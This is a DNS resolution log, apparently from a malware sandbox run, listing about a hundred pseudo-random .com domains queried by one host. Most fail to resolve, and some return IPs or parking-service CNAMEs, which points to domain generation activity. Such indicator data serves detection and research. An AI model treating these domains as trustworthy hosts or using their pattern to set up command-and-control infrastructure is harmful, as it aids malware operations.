Nov 11, 2024 18:13:00.795208931 CET	1.1.1.1	192.168.2.6	0x446c	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.801354885 CET	1.1.1.1	192.168.2.6	0x5cbe	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.827748060 CET	1.1.1.1	192.168.2.6	0x1546	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.844214916 CET	1.1.1.1	192.168.2.6	0x6383	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.846661091 CET	1.1.1.1	192.168.2.6	0x45f2	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.877998114 CET	1.1.1.1	192.168.2.6	0xc575	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.879206896 CET	1.1.1.1	192.168.2.6	0x377b	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.899543047 CET	1.1.1.1	192.168.2.6	0x8319	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.925476074 CET	1.1.1.1	192.168.2.6	0x8df3	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.929377079 CET	1.1.1.1	192.168.2.6	0x20b1	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.930109024 CET	1.1.1.1	192.168.2.6	0xf4b8	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.930768967 CET	1.1.1.1	192.168.2.6	0xc064	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.937433958 CET	1.1.1.1	192.168.2.6	0x5d4	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.952635050 CET	1.1.1.1	192.168.2.6	0x1b48	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.954257011 CET	1.1.1.1	192.168.2.6	0x966	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.979260921 CET	1.1.1.1	192.168.2.6	0x8fa4	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.984088898 CET	1.1.1.1	192.168.2.6	0x4c7	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.984100103 CET	1.1.1.1	192.168.2.6	0xda4c	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.984358072 CET	1.1.1.1	192.168.2.6	0x2dd2	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.989037037 CET	1.1.1.1	192.168.2.6	0xe554	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:00.989037037 CET	1.1.1.1	192.168.2.6	0xe554	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.005829096 CET	1.1.1.1	192.168.2.6	0x86a9	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.008578062 CET	1.1.1.1	192.168.2.6	0xc336	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.009963036 CET	1.1.1.1	192.168.2.6	0x8986	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.011498928 CET	1.1.1.1	192.168.2.6	0xe01a	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.021811008 CET	1.1.1.1	192.168.2.6	0x4c32	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.022244930 CET	1.1.1.1	192.168.2.6	0x172a	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.030153990 CET	1.1.1.1	192.168.2.6	0x4da6	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.041740894 CET	1.1.1.1	192.168.2.6	0x3ffb	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.121042013 CET	1.1.1.1	192.168.2.6	0x6115	No error (0)	vojyqem.com	77980.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:01.121042013 CET	1.1.1.1	192.168.2.6	0x6115	No error (0)	77980.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.172548056 CET	1.1.1.1	192.168.2.6	0x8db0	No error (0)	puzylyp.com		99.83.170.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.172548056 CET	1.1.1.1	192.168.2.6	0x8db0	No error (0)	puzylyp.com		75.2.71.199	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.211354971 CET	1.1.1.1	192.168.2.6	0xf1c3	Server failure (2)	lysyfyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.234741926 CET	1.1.1.1	192.168.2.6	0xa0	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:01.246675968 CET	1.1.1.1	192.168.2.6	0xed6c	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.859343052 CET	1.1.1.1	192.168.2.6	0xdfac	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.859343052 CET	1.1.1.1	192.168.2.6	0xdfac	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.884171009 CET	1.1.1.1	192.168.2.6	0x7a05	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.884284019 CET	1.1.1.1	192.168.2.6	0x9955	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.892612934 CET	1.1.1.1	192.168.2.6	0x9302	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.894937992 CET	1.1.1.1	192.168.2.6	0x7b33	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.895286083 CET	1.1.1.1	192.168.2.6	0x7ae4	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.899530888 CET	1.1.1.1	192.168.2.6	0x2264	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.902462006 CET	1.1.1.1	192.168.2.6	0x7ce0	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.911498070 CET	1.1.1.1	192.168.2.6	0x81ed	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.916331053 CET	1.1.1.1	192.168.2.6	0x62b1	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.916605949 CET	1.1.1.1	192.168.2.6	0xc497	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.916640043 CET	1.1.1.1	192.168.2.6	0x596	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.916740894 CET	1.1.1.1	192.168.2.6	0x6035	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.924478054 CET	1.1.1.1	192.168.2.6	0x649d	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.925772905 CET	1.1.1.1	192.168.2.6	0x2d4c	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.968777895 CET	1.1.1.1	192.168.2.6	0x7dbf	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:04.994342089 CET	1.1.1.1	192.168.2.6	0x7b5b	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.005507946 CET	1.1.1.1	192.168.2.6	0xf494	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.007296085 CET	1.1.1.1	192.168.2.6	0x4310	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.008663893 CET	1.1.1.1	192.168.2.6	0xfe83	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.010601044 CET	1.1.1.1	192.168.2.6	0xb2dc	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.011411905 CET	1.1.1.1	192.168.2.6	0x7a16	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.013659954 CET	1.1.1.1	192.168.2.6	0x7769	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.014492989 CET	1.1.1.1	192.168.2.6	0x39f1	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.015151024 CET	1.1.1.1	192.168.2.6	0x4c61	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.015405893 CET	1.1.1.1	192.168.2.6	0x51b7	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.017164946 CET	1.1.1.1	192.168.2.6	0xf56e	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.019479990 CET	1.1.1.1	192.168.2.6	0xb0a3	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.020961046 CET	1.1.1.1	192.168.2.6	0xbdeb	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.021863937 CET	1.1.1.1	192.168.2.6	0x11e1	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.026231050 CET	1.1.1.1	192.168.2.6	0xd584	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.046180010 CET	1.1.1.1	192.168.2.6	0x2b15	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.046192884 CET	1.1.1.1	192.168.2.6	0x1006	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.046214104 CET	1.1.1.1	192.168.2.6	0x2678	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.046251059 CET	1.1.1.1	192.168.2.6	0x3af1	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.046260118 CET	1.1.1.1	192.168.2.6	0x8158	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.049031973 CET	1.1.1.1	192.168.2.6	0x438	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.051028967 CET	1.1.1.1	192.168.2.6	0x95c	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.051028967 CET	1.1.1.1	192.168.2.6	0x95c	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.051620007 CET	1.1.1.1	192.168.2.6	0x3a0a	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.053740978 CET	1.1.1.1	192.168.2.6	0xedfa	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.053795099 CET	1.1.1.1	192.168.2.6	0x7c8c	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.053805113 CET	1.1.1.1	192.168.2.6	0x70e6	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.053816080 CET	1.1.1.1	192.168.2.6	0x3d1b	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.053910017 CET	1.1.1.1	192.168.2.6	0x5e26	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.054917097 CET	1.1.1.1	192.168.2.6	0xb2ce	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.073045969 CET	1.1.1.1	192.168.2.6	0xc3ce	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.073626995 CET	1.1.1.1	192.168.2.6	0xf84	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.073637962 CET	1.1.1.1	192.168.2.6	0x1c5b	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.075634003 CET	1.1.1.1	192.168.2.6	0x56c6	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.129367113 CET	1.1.1.1	192.168.2.6	0xd20	No error (0)	lygynud.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.155678034 CET	1.1.1.1	192.168.2.6	0x8b2c	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.163007021 CET	1.1.1.1	192.168.2.6	0x739a	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.166435957 CET	1.1.1.1	192.168.2.6	0xba1f	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.191023111 CET	1.1.1.1	192.168.2.6	0xf36c	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.201185942 CET	1.1.1.1	192.168.2.6	0x8268	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.217833042 CET	1.1.1.1	192.168.2.6	0xbaa7	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.236402035 CET	1.1.1.1	192.168.2.6	0xcbbc	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.259545088 CET	1.1.1.1	192.168.2.6	0xefe4	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.259974003 CET	1.1.1.1	192.168.2.6	0xfa3d	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.641787052 CET	1.1.1.1	192.168.2.6	0xb503	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.641803026 CET	1.1.1.1	192.168.2.6	0xaf8a	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.642106056 CET	1.1.1.1	192.168.2.6	0xb03b	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.642117023 CET	1.1.1.1	192.168.2.6	0x7b33	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:05.646610975 CET	1.1.1.1	192.168.2.6	0x458b	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:05.646610975 CET	1.1.1.1	192.168.2.6	0x458b	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:05.646610975 CET	1.1.1.1	192.168.2.6	0x458b	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.10.48	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.637120962 CET	1.1.1.1	192.168.2.6	0xe4f6	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.637501955 CET	1.1.1.1	192.168.2.6	0xe280	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.637970924 CET	1.1.1.1	192.168.2.6	0x9f72	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.638159037 CET	1.1.1.1	192.168.2.6	0x790e	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.645538092 CET	1.1.1.1	192.168.2.6	0x1eb	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.646284103 CET	1.1.1.1	192.168.2.6	0xa360	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.683963060 CET	1.1.1.1	192.168.2.6	0x3aa1	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.690654993 CET	1.1.1.1	192.168.2.6	0xdd8a	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.717837095 CET	1.1.1.1	192.168.2.6	0x208c	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.722796917 CET	1.1.1.1	192.168.2.6	0x1d41	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.726191998 CET	1.1.1.1	192.168.2.6	0x9d07	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.732661963 CET	1.1.1.1	192.168.2.6	0xa2ef	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.757385969 CET	1.1.1.1	192.168.2.6	0x67d4	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.781661987 CET	1.1.1.1	192.168.2.6	0x7c73	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.803673983 CET	1.1.1.1	192.168.2.6	0x11e3	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.804311991 CET	1.1.1.1	192.168.2.6	0xd496	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.823837042 CET	1.1.1.1	192.168.2.6	0xf33d	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.830540895 CET	1.1.1.1	192.168.2.6	0x5b50	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.854726076 CET	1.1.1.1	192.168.2.6	0x5c5b	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.859141111 CET	1.1.1.1	192.168.2.6	0x2f1b	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.859337091 CET	1.1.1.1	192.168.2.6	0x30b5	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.863146067 CET	1.1.1.1	192.168.2.6	0xb23f	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.864526987 CET	1.1.1.1	192.168.2.6	0x61ae	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.878812075 CET	1.1.1.1	192.168.2.6	0xe2b0	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.881738901 CET	1.1.1.1	192.168.2.6	0x16e9	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.883873940 CET	1.1.1.1	192.168.2.6	0x5629	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.884197950 CET	1.1.1.1	192.168.2.6	0xe845	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.884969950 CET	1.1.1.1	192.168.2.6	0x4aa1	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.884982109 CET	1.1.1.1	192.168.2.6	0x6dcb	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.885392904 CET	1.1.1.1	192.168.2.6	0xe6c2	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.885695934 CET	1.1.1.1	192.168.2.6	0xc0e3	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.887810946 CET	1.1.1.1	192.168.2.6	0xbff8	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.888006926 CET	1.1.1.1	192.168.2.6	0xde30	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.889401913 CET	1.1.1.1	192.168.2.6	0xf000	No error (0)	qexyhuv.com		76.223.67.189	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.889401913 CET	1.1.1.1	192.168.2.6	0xf000	No error (0)	qexyhuv.com		13.248.213.45	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.892905951 CET	1.1.1.1	192.168.2.6	0x6290	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.904047012 CET	1.1.1.1	192.168.2.6	0xea4b	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.905361891 CET	1.1.1.1	192.168.2.6	0x4eeb	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.905715942 CET	1.1.1.1	192.168.2.6	0x4ff6	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.906930923 CET	1.1.1.1	192.168.2.6	0xa025	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.907300949 CET	1.1.1.1	192.168.2.6	0x7bb0	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:11.909528017 CET	1.1.1.1	192.168.2.6	0xff34	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.960150957 CET	1.1.1.1	192.168.2.6	0xce08	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.961061001 CET	1.1.1.1	192.168.2.6	0x2625	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.961077929 CET	1.1.1.1	192.168.2.6	0x7bb7	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.961839914 CET	1.1.1.1	192.168.2.6	0xd12c	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.971543074 CET	1.1.1.1	192.168.2.6	0x8a43	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.971860886 CET	1.1.1.1	192.168.2.6	0x7d14	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.971873045 CET	1.1.1.1	192.168.2.6	0xd12c	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.971916914 CET	1.1.1.1	192.168.2.6	0x2625	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.971983910 CET	1.1.1.1	192.168.2.6	0x72a5	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972207069 CET	1.1.1.1	192.168.2.6	0x7bb7	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972260952 CET	1.1.1.1	192.168.2.6	0x9405	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972270966 CET	1.1.1.1	192.168.2.6	0xce08	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972413063 CET	1.1.1.1	192.168.2.6	0xacb9	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972424030 CET	1.1.1.1	192.168.2.6	0xb4a7	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972924948 CET	1.1.1.1	192.168.2.6	0x9f98	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972935915 CET	1.1.1.1	192.168.2.6	0x5092	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.972948074 CET	1.1.1.1	192.168.2.6	0xbaf3	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.973057985 CET	1.1.1.1	192.168.2.6	0x24fc	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.979659081 CET	1.1.1.1	192.168.2.6	0xa899	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.986020088 CET	1.1.1.1	192.168.2.6	0xa630	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.993453979 CET	1.1.1.1	192.168.2.6	0xe42b	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.993510008 CET	1.1.1.1	192.168.2.6	0x6107	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.993597984 CET	1.1.1.1	192.168.2.6	0x546d	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.993865967 CET	1.1.1.1	192.168.2.6	0x42b6	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:12.999545097 CET	1.1.1.1	192.168.2.6	0x62fa	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:13.116051912 CET	1.1.1.1	192.168.2.6	0x11f8	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:13.877888918 CET	1.1.1.1	192.168.2.6	0xab6f	No error (0)	ww25.lyxynyx.com	77026.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:13.877888918 CET	1.1.1.1	192.168.2.6	0xab6f	No error (0)	77026.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.105432034 CET	1.1.1.1	192.168.2.6	0xa716	No error (0)	ww16.vofycot.com	www.sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 18:13:14.105432034 CET	1.1.1.1	192.168.2.6	0xa716	No error (0)	www.sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.997764111 CET	1.1.1.1	192.168.2.6	0x68b3	Name error (3)	vopyret.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:14.998370886 CET	1.1.1.1	192.168.2.6	0x5be	Name error (3)	qekyvav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.001090050 CET	1.1.1.1	192.168.2.6	0x694c	Name error (3)	ganyhuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.004494905 CET	1.1.1.1	192.168.2.6	0x2070	Name error (3)	pupytyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:15.005635977 CET	1.1.1.1	192.168.2.6	0xeff3	Name error (3)	qebyhuq.com	none	none	A (IP address)	IN (0x0001)	false
